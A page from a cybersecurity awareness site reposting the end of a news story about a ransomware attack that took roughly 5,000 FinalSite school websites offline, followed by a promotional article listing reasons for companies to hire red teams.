
“We immediately took steps to secure our systems and to contain the activity. We quickly launched an investigation into the event with the assistance of third-party forensic specialists, and began proactively taking certain systems offline.”

However, in a template created by FinalSite that schools can send to parents, there is no mention of the ransomware attack, and just that FinalSite is experiencing a “disruption of certain computer systems on its network.”

Morgan Delack, the Director of Communications for FinalSite, told BleepingComputer that they proactively shut down their IT systems to prevent the spread of the attack, which led to approximately 5,000 school websites going offline.

“It’s important to note that the malware did not shut down our systems – we proactively did so immediately upon learning of what happened in order to protect and secure our data. In doing so, we took approximately 5,000 school websites offline in order to rebuild them in a new, safe environment,” Delack shared in a statement.

While Delack could not share the name of the ransomware operation due to ongoing investigations, BleepingComputer was told that there is no evidence of data being compromised, and they are continuing to investigate with a third-party cybersecurity firm.

As most enterprise-targeting ransomware operations steal data before encrypting, we will likely learn in the future if data was accessed in a future update.

ransomware school
Ransomware Fact

Education is a popular target

School districts and universities have become a popular target for ransomware operations over the years.

This is especially true for K-12 school districts with very limited funding and thus tend to have smaller support teams and less security infrastructure to detect imminent attacks.

“While school districts may not be flush with cash, the fact is that many carry cyber insurance and so can afford to pay demands – and that puts them in the crosshairs”, Emsisoft threat analyst Brett Callow told BleepingComputer.

“Last year, 87 incidents disrupted learning at as many as 1,043 individual schools. In 2020, 84 incidents disrupted learning at 1,681 schools. The fact that the average size of the impacted districts has decreased could indicate a correlation between budget size and (in)security level.”

“The bigger the district, the bigger the security budget and the better the security that’s in place.”

source

Read more related cybersecurity news

Bookmark
Please login to bookmarkClose

7+ Major Reasons to Hire a Red Team to Harden Your App Sec

By
Steven Black (n0tst3)
-
1
a shell in your lunch-box

Application Security and Red Teams

The growing cyberthreat landscape has brought a storm in the online marketplace. From the online studies and research, there were around 500 million attempted ransomware attacks that occurred in 2021. These numbers are even exceeding day by day and if businesses haven’t strategized yet then nothing can save them.

ackers are always having their evil eyes on the websites and finances. Now, it’s become vital for businesses to have the right protocols, policies and procedures in place to keep their data secure and strengthen their infrastructure, making them resilient. With this in mind, companies have now shown their interest in hiring red teams. They identify their susceptibility to any attack by testing their systems and networks before an attacker does. 

Do you have any idea about red teams? Have you ever heard about it?  If, not read this article. Here we’ll discuss the red team and the benefits of hiring them. So, let’s jump in.

What is Red Team?

A red team is a group of ethical hackers that helps the company to test its system security. This group will identify weaknesses in the company’s web applications and networks, which the same team can later remediate.

coalition

They’ll try to penetrate the systems just like the hackers do and find the loopholes. The red teaming process will help you understand your actual security posture and how well your security controls are working.

Why you should hire a red team?

There are certain reasons that will make your company hire a red team. This team will help you find the loopholes in your system and also it helps to make your system more secure. Here are some of the compelling reasons to hire a red team. Take a look.

1. Detection of Software Bugs  

The ethical hackers will work on the mission to find out all existing bugs in your software security. They identify threats and vulnerabilities before cybercriminals can exploit them. The red team will reduce the cost of managing associated risks by finding these bugs.

For example, if you use particular software to manage your passwords, the hackers will exploit it. Thus, the red team will find loopholes and report them to you. It will give you a chance to fix these bugs before the hackers can take advantage of them.

2. Improved Cybersecurity

When you have a red team in your organization, it helps you improve your cybersecurity posture. The team will identify all the weaknesses in your security and help you patch them up. Thus, it becomes difficult for hackers to penetrate your systems.

An excellent example of this is Equifax’s attack in 2017. The company had failed to patch up a known vulnerability in one of its systems. As a result, hackers could steal the personal information of more than 143 million people. If Equifax had a red team, it could have identified and patched the vulnerability before the attack.

3. Risk Mitigation

According to Gartner, “The use of a red team in an ethical hacking program has the potential to reduce the probability and impact of future cyberattacks by identifying security vulnerabilities in IT systems before attackers can exploit them.”

Red teams are capable of assessing your system’s exposure level to different security threats. It helps the company to identify what needs to be fixed immediately and what can be done in a phased manner.

4. Identify Technical Improvements

Red teams help organizations understand their technical vulnerabilities and identify areas of improvement. The team uses assessment frameworks such as NIST, OWASP, etc., to assess application security.

Once the vulnerabilities are identified, the red team will work with the organization’s developers to fix them. It will help improve the overall security of the applications and make them less prone to cyberattacks.

For example, if your organization uses an outdated version of the software, the red team will identify it and suggest you update it. It’ll help in fixing the known vulnerabilities present in that software.

5. Assessment of Third-Party Vendors

Organizations nowadays rely on third-party vendors to run their business operations. This, however, makes them more vulnerable to cyberattacks. A hacker can easily penetrate the third-party vendor’s systems and steal the data.

Red teams help organizations in assessing the security posture of their third-party vendors. They look for vulnerabilities in the vendor’s system and check if any malware is present. It’ll help you to take necessary measures to secure your systems before a significant security breach occurs.

For example, if your organization uses a cloud-based storage solution, the red team will test it for vulnerabilities. If they find any, they’ll report it to you and suggest you take appropriate action.

6. Testing of Emergency Response Plans

It becomes difficult for organizations to test their emergency response plans, as it may hamper their day-to-day operations. However, Red teams can help you test these plans without interrupting your everyday operations.

The team will first identify the vulnerabilities which need to be tested and then test them. They’ll provide a report on whether your plan is strong enough or not. If it’s not, they’ll suggest ways of strengthening it.

For example, let’s say your organization plans to deal with a ransomware attack. The red team will test it by infecting one of its systems with ransomware. They’ll then check if the organization could effectively contain the infection and recover the data.

7. Helps in Building a Cybersecurity Culture

An organization needs to have a cybersecurity culture to be secure against cyberattacks. Red teams can help build this culture by training the employees to identify and respond to security threats.

The team will first identify the weaknesses in your security and help you patch them up. They’ll then train your employees on identifying different types of security threats before they are executed. It’ll help them secure their systems and minimize the impact of cyberattacks.

For example, suppose your organization is storing its data in the cloud. In that case, the red team will first check how securely it’s stored and then train your employees to identify and report suspicious activity.

8. Testing the Effectiveness of Disaster Recovery Plan

It becomes difficult for organizations to test their disaster recovery plans, especially when taking down an entire system. Red teams can help in trying these plans without disrupting their everyday activities.

The team will first identify what needs to be tested and then do it without interrupting your regular operations. They’ll then provide a report on the effectiveness of your plan and whether it can live up to your expectations or not.

For example- Let’s say your organization has a disaster recovery plan that involves restoring one of its systems from backup. The red team first tests if that system is recoverable, following which they send simulated alerts to the organization. They then check if the organization could respond to the warnings and recover the system successfully.

Conclusion

Red teams are a vital part of any organization’s cybersecurity strategy. They help identify the vulnerabilities in your system and suggest ways of fixing them. They also help in building a cybersecurity culture within your organization. So, if you’re not using a red team yet, it’s time to consider doing so!

source

Bookmark
Please login to bookmarkClose
1...606162...79Page 61 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.